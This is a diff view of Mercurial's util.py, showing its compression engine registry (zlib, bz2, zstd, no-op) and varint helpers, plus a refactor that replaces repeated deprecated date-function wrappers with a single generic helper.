3608 3608 def __init__(self):
3609 3609 self._engines = {}
3610 3610 # Bundle spec human name to engine name.
3611 3611 self._bundlenames = {}
3612 3612 # Internal bundle identifier to engine name.
3613 3613 self._bundletypes = {}
3614 3614 # Revlog header to engine name.
3615 3615 self._revlogheaders = {}
3616 3616 # Wire proto identifier to engine name.
3617 3617 self._wiretypes = {}
3618 3618
3619 3619 def __getitem__(self, key):
3620 3620 return self._engines[key]
3621 3621
3622 3622 def __contains__(self, key):
3623 3623 return key in self._engines
3624 3624
3625 3625 def __iter__(self):
3626 3626 return iter(self._engines.keys())
3627 3627
3628 3628 def register(self, engine):
3629 3629 """Register a compression engine with the manager.
3630 3630
3631 3631 The argument must be a ``compressionengine`` instance.
3632 3632 """
3633 3633 if not isinstance(engine, compressionengine):
3634 3634 raise ValueError(_('argument must be a compressionengine'))
3635 3635
3636 3636 name = engine.name()
3637 3637
3638 3638 if name in self._engines:
3639 3639 raise error.Abort(_('compression engine %s already registered') %
3640 3640 name)
3641 3641
3642 3642 bundleinfo = engine.bundletype()
3643 3643 if bundleinfo:
3644 3644 bundlename, bundletype = bundleinfo
3645 3645
3646 3646 if bundlename in self._bundlenames:
3647 3647 raise error.Abort(_('bundle name %s already registered') %
3648 3648 bundlename)
3649 3649 if bundletype in self._bundletypes:
3650 3650 raise error.Abort(_('bundle type %s already registered by %s') %
3651 3651 (bundletype, self._bundletypes[bundletype]))
3652 3652
3653 3653 # No external facing name declared.
3654 3654 if bundlename:
3655 3655 self._bundlenames[bundlename] = name
3656 3656
3657 3657 self._bundletypes[bundletype] = name
3658 3658
3659 3659 wiresupport = engine.wireprotosupport()
3660 3660 if wiresupport:
3661 3661 wiretype = wiresupport.name
3662 3662 if wiretype in self._wiretypes:
3663 3663 raise error.Abort(_('wire protocol compression %s already '
3664 3664 'registered by %s') %
3665 3665 (wiretype, self._wiretypes[wiretype]))
3666 3666
3667 3667 self._wiretypes[wiretype] = name
3668 3668
3669 3669 revlogheader = engine.revlogheader()
3670 3670 if revlogheader and revlogheader in self._revlogheaders:
3671 3671 raise error.Abort(_('revlog header %s already registered by %s') %
3672 3672 (revlogheader, self._revlogheaders[revlogheader]))
3673 3673
3674 3674 if revlogheader:
3675 3675 self._revlogheaders[revlogheader] = name
3676 3676
3677 3677 self._engines[name] = engine
3678 3678
3679 3679 @property
3680 3680 def supportedbundlenames(self):
3681 3681 return set(self._bundlenames.keys())
3682 3682
3683 3683 @property
3684 3684 def supportedbundletypes(self):
3685 3685 return set(self._bundletypes.keys())
3686 3686
3687 3687 def forbundlename(self, bundlename):
3688 3688 """Obtain a compression engine registered to a bundle name.
3689 3689
3690 3690 Will raise KeyError if the bundle type isn't registered.
3691 3691
3692 3692 Will abort if the engine is known but not available.
3693 3693 """
3694 3694 engine = self._engines[self._bundlenames[bundlename]]
3695 3695 if not engine.available():
3696 3696 raise error.Abort(_('compression engine %s could not be loaded') %
3697 3697 engine.name())
3698 3698 return engine
3699 3699
3700 3700 def forbundletype(self, bundletype):
3701 3701 """Obtain a compression engine registered to a bundle type.
3702 3702
3703 3703 Will raise KeyError if the bundle type isn't registered.
3704 3704
3705 3705 Will abort if the engine is known but not available.
3706 3706 """
3707 3707 engine = self._engines[self._bundletypes[bundletype]]
3708 3708 if not engine.available():
3709 3709 raise error.Abort(_('compression engine %s could not be loaded') %
3710 3710 engine.name())
3711 3711 return engine
3712 3712
3713 3713 def supportedwireengines(self, role, onlyavailable=True):
3714 3714 """Obtain compression engines that support the wire protocol.
3715 3715
3716 3716 Returns a list of engines in prioritized order, most desired first.
3717 3717
3718 3718 If ``onlyavailable`` is set, filter out engines that can't be
3719 3719 loaded.
3720 3720 """
3721 3721 assert role in (SERVERROLE, CLIENTROLE)
3722 3722
3723 3723 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3724 3724
3725 3725 engines = [self._engines[e] for e in self._wiretypes.values()]
3726 3726 if onlyavailable:
3727 3727 engines = [e for e in engines if e.available()]
3728 3728
3729 3729 def getkey(e):
3730 3730 # Sort first by priority, highest first. In case of tie, sort
3731 3731 # alphabetically. This is arbitrary, but ensures output is
3732 3732 # stable.
3733 3733 w = e.wireprotosupport()
3734 3734 return -1 * getattr(w, attr), w.name
3735 3735
3736 3736 return list(sorted(engines, key=getkey))
3737 3737
3738 3738 def forwiretype(self, wiretype):
3739 3739 engine = self._engines[self._wiretypes[wiretype]]
3740 3740 if not engine.available():
3741 3741 raise error.Abort(_('compression engine %s could not be loaded') %
3742 3742 engine.name())
3743 3743 return engine
3744 3744
3745 3745 def forrevlogheader(self, header):
3746 3746 """Obtain a compression engine registered to a revlog header.
3747 3747
3748 3748 Will raise KeyError if the revlog header value isn't registered.
3749 3749 """
3750 3750 return self._engines[self._revlogheaders[header]]
3751 3751
3752 3752 compengines = compressormanager()
3753 3753
3754 3754 class compressionengine(object):
3755 3755 """Base class for compression engines.
3756 3756
3757 3757 Compression engines must implement the interface defined by this class.
3758 3758 """
3759 3759 def name(self):
3760 3760 """Returns the name of the compression engine.
3761 3761
3762 3762 This is the key the engine is registered under.
3763 3763
3764 3764 This method must be implemented.
3765 3765 """
3766 3766 raise NotImplementedError()
3767 3767
3768 3768 def available(self):
3769 3769 """Whether the compression engine is available.
3770 3770
3771 3771 The intent of this method is to allow optional compression engines
3772 3772 that may not be available in all installations (such as engines relying
3773 3773 on C extensions that may not be present).
3774 3774 """
3775 3775 return True
3776 3776
3777 3777 def bundletype(self):
3778 3778 """Describes bundle identifiers for this engine.
3779 3779
3780 3780 If this compression engine isn't supported for bundles, returns None.
3781 3781
3782 3782 If this engine can be used for bundles, returns a 2-tuple of strings of
3783 3783 the user-facing "bundle spec" compression name and an internal
3784 3784 identifier used to denote the compression format within bundles. To
3785 3785 exclude the name from external usage, set the first element to ``None``.
3786 3786
3787 3787 If bundle compression is supported, the class must also implement
3788 3788 ``compressstream`` and `decompressorreader``.
3789 3789
3790 3790 The docstring of this method is used in the help system to tell users
3791 3791 about this engine.
3792 3792 """
3793 3793 return None
3794 3794
3795 3795 def wireprotosupport(self):
3796 3796 """Declare support for this compression format on the wire protocol.
3797 3797
3798 3798 If this compression engine isn't supported for compressing wire
3799 3799 protocol payloads, returns None.
3800 3800
3801 3801 Otherwise, returns ``compenginewireprotosupport`` with the following
3802 3802 fields:
3803 3803
3804 3804 * String format identifier
3805 3805 * Integer priority for the server
3806 3806 * Integer priority for the client
3807 3807
3808 3808 The integer priorities are used to order the advertisement of format
3809 3809 support by server and client. The highest integer is advertised
3810 3810 first. Integers with non-positive values aren't advertised.
3811 3811
3812 3812 The priority values are somewhat arbitrary and only used for default
3813 3813 ordering. The relative order can be changed via config options.
3814 3814
3815 3815 If wire protocol compression is supported, the class must also implement
3816 3816 ``compressstream`` and ``decompressorreader``.
3817 3817 """
3818 3818 return None
3819 3819
3820 3820 def revlogheader(self):
3821 3821 """Header added to revlog chunks that identifies this engine.
3822 3822
3823 3823 If this engine can be used to compress revlogs, this method should
3824 3824 return the bytes used to identify chunks compressed with this engine.
3825 3825 Else, the method should return ``None`` to indicate it does not
3826 3826 participate in revlog compression.
3827 3827 """
3828 3828 return None
3829 3829
3830 3830 def compressstream(self, it, opts=None):
3831 3831 """Compress an iterator of chunks.
3832 3832
3833 3833 The method receives an iterator (ideally a generator) of chunks of
3834 3834 bytes to be compressed. It returns an iterator (ideally a generator)
3835 3835 of bytes of chunks representing the compressed output.
3836 3836
3837 3837 Optionally accepts an argument defining how to perform compression.
3838 3838 Each engine treats this argument differently.
3839 3839 """
3840 3840 raise NotImplementedError()
3841 3841
3842 3842 def decompressorreader(self, fh):
3843 3843 """Perform decompression on a file object.
3844 3844
3845 3845 Argument is an object with a ``read(size)`` method that returns
3846 3846 compressed data. Return value is an object with a ``read(size)`` that
3847 3847 returns uncompressed data.
3848 3848 """
3849 3849 raise NotImplementedError()
3850 3850
3851 3851 def revlogcompressor(self, opts=None):
3852 3852 """Obtain an object that can be used to compress revlog entries.
3853 3853
3854 3854 The object has a ``compress(data)`` method that compresses binary
3855 3855 data. This method returns compressed binary data or ``None`` if
3856 3856 the data could not be compressed (too small, not compressible, etc).
3857 3857 The returned data should have a header uniquely identifying this
3858 3858 compression format so decompression can be routed to this engine.
3859 3859 This header should be identified by the ``revlogheader()`` return
3860 3860 value.
3861 3861
3862 3862 The object has a ``decompress(data)`` method that decompresses
3863 3863 data. The method will only be called if ``data`` begins with
3864 3864 ``revlogheader()``. The method should return the raw, uncompressed
3865 3865 data or raise a ``RevlogError``.
3866 3866
3867 3867 The object is reusable but is not thread safe.
3868 3868 """
3869 3869 raise NotImplementedError()
3870 3870
3871 3871 class _zlibengine(compressionengine):
3872 3872 def name(self):
3873 3873 return 'zlib'
3874 3874
3875 3875 def bundletype(self):
3876 3876 """zlib compression using the DEFLATE algorithm.
3877 3877
3878 3878 All Mercurial clients should support this format. The compression
3879 3879 algorithm strikes a reasonable balance between compression ratio
3880 3880 and size.
3881 3881 """
3882 3882 return 'gzip', 'GZ'
3883 3883
3884 3884 def wireprotosupport(self):
3885 3885 return compewireprotosupport('zlib', 20, 20)
3886 3886
3887 3887 def revlogheader(self):
3888 3888 return 'x'
3889 3889
3890 3890 def compressstream(self, it, opts=None):
3891 3891 opts = opts or {}
3892 3892
3893 3893 z = zlib.compressobj(opts.get('level', -1))
3894 3894 for chunk in it:
3895 3895 data = z.compress(chunk)
3896 3896 # Not all calls to compress emit data. It is cheaper to inspect
3897 3897 # here than to feed empty chunks through generator.
3898 3898 if data:
3899 3899 yield data
3900 3900
3901 3901 yield z.flush()
3902 3902
3903 3903 def decompressorreader(self, fh):
3904 3904 def gen():
3905 3905 d = zlib.decompressobj()
3906 3906 for chunk in filechunkiter(fh):
3907 3907 while chunk:
3908 3908 # Limit output size to limit memory.
3909 3909 yield d.decompress(chunk, 2 ** 18)
3910 3910 chunk = d.unconsumed_tail
3911 3911
3912 3912 return chunkbuffer(gen())
3913 3913
3914 3914 class zlibrevlogcompressor(object):
3915 3915 def compress(self, data):
3916 3916 insize = len(data)
3917 3917 # Caller handles empty input case.
3918 3918 assert insize > 0
3919 3919
3920 3920 if insize < 44:
3921 3921 return None
3922 3922
3923 3923 elif insize <= 1000000:
3924 3924 compressed = zlib.compress(data)
3925 3925 if len(compressed) < insize:
3926 3926 return compressed
3927 3927 return None
3928 3928
3929 3929 # zlib makes an internal copy of the input buffer, doubling
3930 3930 # memory usage for large inputs. So do streaming compression
3931 3931 # on large inputs.
3932 3932 else:
3933 3933 z = zlib.compressobj()
3934 3934 parts = []
3935 3935 pos = 0
3936 3936 while pos < insize:
3937 3937 pos2 = pos + 2**20
3938 3938 parts.append(z.compress(data[pos:pos2]))
3939 3939 pos = pos2
3940 3940 parts.append(z.flush())
3941 3941
3942 3942 if sum(map(len, parts)) < insize:
3943 3943 return ''.join(parts)
3944 3944 return None
3945 3945
3946 3946 def decompress(self, data):
3947 3947 try:
3948 3948 return zlib.decompress(data)
3949 3949 except zlib.error as e:
3950 3950 raise error.RevlogError(_('revlog decompress error: %s') %
3951 3951 forcebytestr(e))
3952 3952
3953 3953 def revlogcompressor(self, opts=None):
3954 3954 return self.zlibrevlogcompressor()
3955 3955
3956 3956 compengines.register(_zlibengine())
3957 3957
3958 3958 class _bz2engine(compressionengine):
3959 3959 def name(self):
3960 3960 return 'bz2'
3961 3961
3962 3962 def bundletype(self):
3963 3963 """An algorithm that produces smaller bundles than ``gzip``.
3964 3964
3965 3965 All Mercurial clients should support this format.
3966 3966
3967 3967 This engine will likely produce smaller bundles than ``gzip`` but
3968 3968 will be significantly slower, both during compression and
3969 3969 decompression.
3970 3970
3971 3971 If available, the ``zstd`` engine can yield similar or better
3972 3972 compression at much higher speeds.
3973 3973 """
3974 3974 return 'bzip2', 'BZ'
3975 3975
3976 3976 # We declare a protocol name but don't advertise by default because
3977 3977 # it is slow.
3978 3978 def wireprotosupport(self):
3979 3979 return compewireprotosupport('bzip2', 0, 0)
3980 3980
3981 3981 def compressstream(self, it, opts=None):
3982 3982 opts = opts or {}
3983 3983 z = bz2.BZ2Compressor(opts.get('level', 9))
3984 3984 for chunk in it:
3985 3985 data = z.compress(chunk)
3986 3986 if data:
3987 3987 yield data
3988 3988
3989 3989 yield z.flush()
3990 3990
3991 3991 def decompressorreader(self, fh):
3992 3992 def gen():
3993 3993 d = bz2.BZ2Decompressor()
3994 3994 for chunk in filechunkiter(fh):
3995 3995 yield d.decompress(chunk)
3996 3996
3997 3997 return chunkbuffer(gen())
3998 3998
3999 3999 compengines.register(_bz2engine())
4000 4000
4001 4001 class _truncatedbz2engine(compressionengine):
4002 4002 def name(self):
4003 4003 return 'bz2truncated'
4004 4004
4005 4005 def bundletype(self):
4006 4006 return None, '_truncatedBZ'
4007 4007
4008 4008 # We don't implement compressstream because it is hackily handled elsewhere.
4009 4009
4010 4010 def decompressorreader(self, fh):
4011 4011 def gen():
4012 4012 # The input stream doesn't have the 'BZ' header. So add it back.
4013 4013 d = bz2.BZ2Decompressor()
4014 4014 d.decompress('BZ')
4015 4015 for chunk in filechunkiter(fh):
4016 4016 yield d.decompress(chunk)
4017 4017
4018 4018 return chunkbuffer(gen())
4019 4019
4020 4020 compengines.register(_truncatedbz2engine())
4021 4021
4022 4022 class _noopengine(compressionengine):
4023 4023 def name(self):
4024 4024 return 'none'
4025 4025
4026 4026 def bundletype(self):
4027 4027 """No compression is performed.
4028 4028
4029 4029 Use this compression engine to explicitly disable compression.
4030 4030 """
4031 4031 return 'none', 'UN'
4032 4032
4033 4033 # Clients always support uncompressed payloads. Servers don't because
4034 4034 # unless you are on a fast network, uncompressed payloads can easily
4035 4035 # saturate your network pipe.
4036 4036 def wireprotosupport(self):
4037 4037 return compewireprotosupport('none', 0, 10)
4038 4038
4039 4039 # We don't implement revlogheader because it is handled specially
4040 4040 # in the revlog class.
4041 4041
4042 4042 def compressstream(self, it, opts=None):
4043 4043 return it
4044 4044
4045 4045 def decompressorreader(self, fh):
4046 4046 return fh
4047 4047
4048 4048 class nooprevlogcompressor(object):
4049 4049 def compress(self, data):
4050 4050 return None
4051 4051
4052 4052 def revlogcompressor(self, opts=None):
4053 4053 return self.nooprevlogcompressor()
4054 4054
4055 4055 compengines.register(_noopengine())
4056 4056
4057 4057 class _zstdengine(compressionengine):
4058 4058 def name(self):
4059 4059 return 'zstd'
4060 4060
4061 4061 @propertycache
4062 4062 def _module(self):
4063 4063 # Not all installs have the zstd module available. So defer importing
4064 4064 # until first access.
4065 4065 try:
4066 4066 from . import zstd
4067 4067 # Force delayed import.
4068 4068 zstd.__version__
4069 4069 return zstd
4070 4070 except ImportError:
4071 4071 return None
4072 4072
4073 4073 def available(self):
4074 4074 return bool(self._module)
4075 4075
4076 4076 def bundletype(self):
4077 4077 """A modern compression algorithm that is fast and highly flexible.
4078 4078
4079 4079 Only supported by Mercurial 4.1 and newer clients.
4080 4080
4081 4081 With the default settings, zstd compression is both faster and yields
4082 4082 better compression than ``gzip``. It also frequently yields better
4083 4083 compression than ``bzip2`` while operating at much higher speeds.
4084 4084
4085 4085 If this engine is available and backwards compatibility is not a
4086 4086 concern, it is likely the best available engine.
4087 4087 """
4088 4088 return 'zstd', 'ZS'
4089 4089
4090 4090 def wireprotosupport(self):
4091 4091 return compewireprotosupport('zstd', 50, 50)
4092 4092
4093 4093 def revlogheader(self):
4094 4094 return '\x28'
4095 4095
4096 4096 def compressstream(self, it, opts=None):
4097 4097 opts = opts or {}
4098 4098 # zstd level 3 is almost always significantly faster than zlib
4099 4099 # while providing no worse compression. It strikes a good balance
4100 4100 # between speed and compression.
4101 4101 level = opts.get('level', 3)
4102 4102
4103 4103 zstd = self._module
4104 4104 z = zstd.ZstdCompressor(level=level).compressobj()
4105 4105 for chunk in it:
4106 4106 data = z.compress(chunk)
4107 4107 if data:
4108 4108 yield data
4109 4109
4110 4110 yield z.flush()
4111 4111
4112 4112 def decompressorreader(self, fh):
4113 4113 zstd = self._module
4114 4114 dctx = zstd.ZstdDecompressor()
4115 4115 return chunkbuffer(dctx.read_from(fh))
4116 4116
4117 4117 class zstdrevlogcompressor(object):
4118 4118 def __init__(self, zstd, level=3):
4119 4119 # Writing the content size adds a few bytes to the output. However,
4120 4120 # it allows decompression to be more optimal since we can
4121 4121 # pre-allocate a buffer to hold the result.
4122 4122 self._cctx = zstd.ZstdCompressor(level=level,
4123 4123 write_content_size=True)
4124 4124 self._dctx = zstd.ZstdDecompressor()
4125 4125 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4126 4126 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4127 4127
4128 4128 def compress(self, data):
4129 4129 insize = len(data)
4130 4130 # Caller handles empty input case.
4131 4131 assert insize > 0
4132 4132
4133 4133 if insize < 50:
4134 4134 return None
4135 4135
4136 4136 elif insize <= 1000000:
4137 4137 compressed = self._cctx.compress(data)
4138 4138 if len(compressed) < insize:
4139 4139 return compressed
4140 4140 return None
4141 4141 else:
4142 4142 z = self._cctx.compressobj()
4143 4143 chunks = []
4144 4144 pos = 0
4145 4145 while pos < insize:
4146 4146 pos2 = pos + self._compinsize
4147 4147 chunk = z.compress(data[pos:pos2])
4148 4148 if chunk:
4149 4149 chunks.append(chunk)
4150 4150 pos = pos2
4151 4151 chunks.append(z.flush())
4152 4152
4153 4153 if sum(map(len, chunks)) < insize:
4154 4154 return ''.join(chunks)
4155 4155 return None
4156 4156
4157 4157 def decompress(self, data):
4158 4158 insize = len(data)
4159 4159
4160 4160 try:
4161 4161 # This was measured to be faster than other streaming
4162 4162 # decompressors.
4163 4163 dobj = self._dctx.decompressobj()
4164 4164 chunks = []
4165 4165 pos = 0
4166 4166 while pos < insize:
4167 4167 pos2 = pos + self._decompinsize
4168 4168 chunk = dobj.decompress(data[pos:pos2])
4169 4169 if chunk:
4170 4170 chunks.append(chunk)
4171 4171 pos = pos2
4172 4172 # Frame should be exhausted, so no finish() API.
4173 4173
4174 4174 return ''.join(chunks)
4175 4175 except Exception as e:
4176 4176 raise error.RevlogError(_('revlog decompress error: %s') %
4177 4177 forcebytestr(e))
4178 4178
4179 4179 def revlogcompressor(self, opts=None):
4180 4180 opts = opts or {}
4181 4181 return self.zstdrevlogcompressor(self._module,
4182 4182 level=opts.get('level', 3))
4183 4183
4184 4184 compengines.register(_zstdengine())
4185 4185
4186 4186 def bundlecompressiontopics():
4187 4187 """Obtains a list of available bundle compressions for use in help."""
4188 4188 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4189 4189 items = {}
4190 4190
4191 4191 # We need to format the docstring. So use a dummy object/type to hold it
4192 4192 # rather than mutating the original.
4193 4193 class docobject(object):
4194 4194 pass
4195 4195
4196 4196 for name in compengines:
4197 4197 engine = compengines[name]
4198 4198
4199 4199 if not engine.available():
4200 4200 continue
4201 4201
4202 4202 bt = engine.bundletype()
4203 4203 if not bt or not bt[0]:
4204 4204 continue
4205 4205
4206 4206 doc = pycompat.sysstr('``%s``\n %s') % (
4207 4207 bt[0], engine.bundletype.__doc__)
4208 4208
4209 4209 value = docobject()
4210 4210 value.__doc__ = doc
4211 4211 value._origdoc = engine.bundletype.__doc__
4212 4212 value._origfunc = engine.bundletype
4213 4213
4214 4214 items[bt[0]] = value
4215 4215
4216 4216 return items
4217 4217
4218 4218 i18nfunctions = bundlecompressiontopics().values()
4219 4219
4220 4220 # convenient shortcut
4221 4221 dst = debugstacktrace
4222 4222
4223 4223 def safename(f, tag, ctx, others=None):
4224 4224 """
4225 4225 Generate a name that it is safe to rename f to in the given context.
4226 4226
4227 4227 f: filename to rename
4228 4228 tag: a string tag that will be included in the new name
4229 4229 ctx: a context, in which the new name must not exist
4230 4230 others: a set of other filenames that the new name must not be in
4231 4231
4232 4232 Returns a file name of the form oldname~tag[~number] which does not exist
4233 4233 in the provided context and is not in the set of other names.
4234 4234 """
4235 4235 if others is None:
4236 4236 others = set()
4237 4237
4238 4238 fn = '%s~%s' % (f, tag)
4239 4239 if fn not in ctx and fn not in others:
4240 4240 return fn
4241 4241 for n in itertools.count(1):
4242 4242 fn = '%s~%s~%s' % (f, tag, n)
4243 4243 if fn not in ctx and fn not in others:
4244 4244 return fn
4245 4245
4246 4246 def readexactly(stream, n):
4247 4247 '''read n bytes from stream.read and abort if less was available'''
4248 4248 s = stream.read(n)
4249 4249 if len(s) < n:
4250 4250 raise error.Abort(_("stream ended unexpectedly"
4251 4251 " (got %d bytes, expected %d)")
4252 4252 % (len(s), n))
4253 4253 return s
4254 4254
4255 4255 def uvarintencode(value):
4256 4256 """Encode an unsigned integer value to a varint.
4257 4257
4258 4258 A varint is a variable length integer of 1 or more bytes. Each byte
4259 4259 except the last has the most significant bit set. The lower 7 bits of
4260 4260 each byte store the 2's complement representation, least significant group
4261 4261 first.
4262 4262
4263 4263 >>> uvarintencode(0)
4264 4264 '\\x00'
4265 4265 >>> uvarintencode(1)
4266 4266 '\\x01'
4267 4267 >>> uvarintencode(127)
4268 4268 '\\x7f'
4269 4269 >>> uvarintencode(1337)
4270 4270 '\\xb9\\n'
4271 4271 >>> uvarintencode(65536)
4272 4272 '\\x80\\x80\\x04'
4273 4273 >>> uvarintencode(-1)
4274 4274 Traceback (most recent call last):
4275 4275 ...
4276 4276 ProgrammingError: negative value for uvarint: -1
4277 4277 """
4278 4278 if value < 0:
4279 4279 raise error.ProgrammingError('negative value for uvarint: %d'
4280 4280 % value)
4281 4281 bits = value & 0x7f
4282 4282 value >>= 7
4283 4283 bytes = []
4284 4284 while value:
4285 4285 bytes.append(pycompat.bytechr(0x80 | bits))
4286 4286 bits = value & 0x7f
4287 4287 value >>= 7
4288 4288 bytes.append(pycompat.bytechr(bits))
4289 4289
4290 4290 return ''.join(bytes)
4291 4291
4292 4292 def uvarintdecodestream(fh):
4293 4293 """Decode an unsigned variable length integer from a stream.
4294 4294
4295 4295 The passed argument is anything that has a ``.read(N)`` method.
4296 4296
4297 4297 >>> try:
4298 4298 ... from StringIO import StringIO as BytesIO
4299 4299 ... except ImportError:
4300 4300 ... from io import BytesIO
4301 4301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4302 4302 0
4303 4303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4304 4304 1
4305 4305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4306 4306 127
4307 4307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4308 4308 1337
4309 4309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4310 4310 65536
4311 4311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4312 4312 Traceback (most recent call last):
4313 4313 ...
4314 4314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4315 4315 """
4316 4316 result = 0
4317 4317 shift = 0
4318 4318 while True:
4319 4319 byte = ord(readexactly(fh, 1))
4320 4320 result |= ((byte & 0x7f) << shift)
4321 4321 if not (byte & 0x80):
4322 4322 return result
4323 4323 shift += 7
4324 4324
4325 4325 ###
4326 4326 # Deprecation warnings for util.py splitting
4327 4327 ###
4328 4328
4329 def _deprecatedfunc(func, version):
4330 def wrapped(*args, **kwargs):
4331 fn = pycompat.sysbytes(func.__name__)
4332 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4333 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4334 nouideprecwarn(msg, version)
4335 return func(*args, **kwargs)
4336 wrapped.__name__ = func.__name__
4337 return wrapped
4338
4329 4339 defaultdateformats = dateutil.defaultdateformats
4330
4331 4340 extendeddateformats = dateutil.extendeddateformats
4332
4333 def makedate(*args, **kwargs):
4334 msg = ("'util.makedate' is deprecated, "
4335 "use 'utils.dateutil.makedate'")
4336 nouideprecwarn(msg, "4.6")
4337 return dateutil.makedate(*args, **kwargs)
4338
4339 def datestr(*args, **kwargs):
4340 msg = ("'util.datestr' is deprecated, "
4341 "use 'utils.dateutil.datestr'")
4342 nouideprecwarn(msg, "4.6")
4343 return dateutil.datestr(*args, **kwargs)
4344
4345 def shortdate(*args, **kwargs):
4346 msg = ("'util.shortdate' is deprecated, "
4347 "use 'utils.dateutil.shortdate'")
4348 nouideprecwarn(msg, "4.6")
4349 return dateutil.shortdate(*args, **kwargs)
4350
4351 def parsetimezone(*args, **kwargs):
4352 msg = ("'util.parsetimezone' is deprecated, "
4353 "use 'utils.dateutil.parsetimezone'")
4354 nouideprecwarn(msg, "4.6")
4355 return dateutil.parsetimezone(*args, **kwargs)
4356
4357 def strdate(*args, **kwargs):
4358 msg = ("'util.strdate' is deprecated, "
4359 "use 'utils.dateutil.strdate'")
4360 nouideprecwarn(msg, "4.6")
4361 return dateutil.strdate(*args, **kwargs)
4362
4363 def parsedate(*args, **kwargs):
4364 msg = ("'util.parsedate' is deprecated, "
4365 "use 'utils.dateutil.parsedate'")
4366 nouideprecwarn(msg, "4.6")
4367 return dateutil.parsedate(*args, **kwargs)
4368
4369 def matchdate(*args, **kwargs):
4370 msg = ("'util.matchdate' is deprecated, "
4371 "use 'utils.dateutil.matchdate'")
4372 nouideprecwarn(msg, "4.6")
4373 return dateutil.matchdate(*args, **kwargs)
4341 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4342 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4343 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4344 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4345 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4346 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4347 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now